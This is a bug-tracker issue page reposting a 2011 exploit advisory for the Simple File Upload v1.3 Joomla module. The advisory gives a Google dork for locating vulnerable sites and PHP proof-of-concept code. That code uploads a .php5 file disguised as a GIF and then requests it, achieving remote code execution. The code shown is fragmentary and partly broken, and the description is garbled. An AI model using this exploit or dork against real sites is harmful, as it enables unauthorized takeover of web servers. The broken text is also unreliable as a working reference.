SiT! Bugs

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0001757Incubator[All Projects] Generalpublic2011-12-28 14:452011-12-28 14:45
Assigned To 
PrioritynormalSeverityminorReproducibilityhave not tried
Platformphp OSwin xp OS Versionpro
Summary0001757: Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit

    Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit
    Author...............: gmda
    Google Dork..........:"Simple File Upload v1.3" "Powered by Joomla"
    Mail.................: gmda[at]email[dot]it
    Site.................: [^]
    Date.................: 26/12/2011
    Software Link: [^]
    Version: 1.3
    Tested on: winxp php version 5.3.2 Apache 2.0
    *the setup of the module is no captcha other setups are the default*
    | This proof of concept code was written for educational purpose only. |
    | Use it at your own risk. Author will be not responsible for any damage. |
    The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly.
    This thing can be a bad intent to send commands to the server running clearly causing safety problems ........
    The script has peroblemi upload quality control .....

$post="POST http://$host/index.php"; [^]
$fp = fsockopen($host, $port, $errno, $errstr, 30);

if(!$fp) die($errstr.$errno); else {

                $data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n";
                $data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n";
                $data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n";


                $packet="$post HTTP/1.1\r\n";
                $packet.="Host: ".$host.":".$port."\r\n";
                $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
                $packet.="Content-Length: ".strlen($data)."\r\n";
                $packet.="Connection: Close\r\n\r\n";

fwrite($fp, $packet);


function exes_file(){
                global $host;
                     @$lines = file("http://".$host."/images/file.php5" [^]);
                     foreach($lines as $line)
                     { $line_ck=$line; }
                     return $line_ck;



    $h = @fopen("http://".$host."/images/file.php5", [^] "r");
      if ($h) {
            while (($buf = fgets($h, 4096)) !== false) {
             echo $buf;
             echo("exploit was successful");
     echo("Error: open");
    }else{ echo "no exsit file";}

TagsNo tags attached.
Attached Files? file icon rce-simple-file-upload-13.php [^] (3,485 bytes) 2011-12-28 14:45

- Relationships

-  Notes
There are no notes attached to this issue.

- Issue History
Date Modified Username Field Change
2011-12-28 14:45 gmda New Issue
2011-12-28 14:45 gmda File Added: rce-simple-file-upload-13.php

Copyright © 2000 - 2020 MantisBT Team
Powered by Mantis Bugtracker